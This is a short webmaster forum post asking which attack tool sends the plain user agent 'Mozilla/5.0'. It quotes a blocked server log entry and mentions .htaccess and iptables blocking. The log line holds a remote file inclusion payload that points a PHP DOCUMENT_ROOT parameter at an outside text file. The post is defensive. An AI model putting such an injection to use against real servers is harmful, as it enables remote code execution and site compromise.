joined:May 5, 2003
I am trying to get some details about a thorn in my server-side ;-)
For a couple of years I have been blocking attack bots with the exact user agent: "Mozilla/5.0"
There must be a hacktool with that default UA, but I cannot find any details about it.
Evidence (from Korean IP space):
218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"
Do any of you guys know what hack tool uses that default user agent? Most of these attacks have APNIC IP addresses, which I look up, convert into CIDRs, and add to my .htaccess and iptables Chinese Blocklists. The exploits are blocked by various rules in my .htaccess. I'm just curious about this user agent.
Thanks in advance; Wiz
[edited by: incrediBILL at 8:17 pm (utc) on Feb 27, 2010]
[edit reason] removed specifics to live bot net [/edit]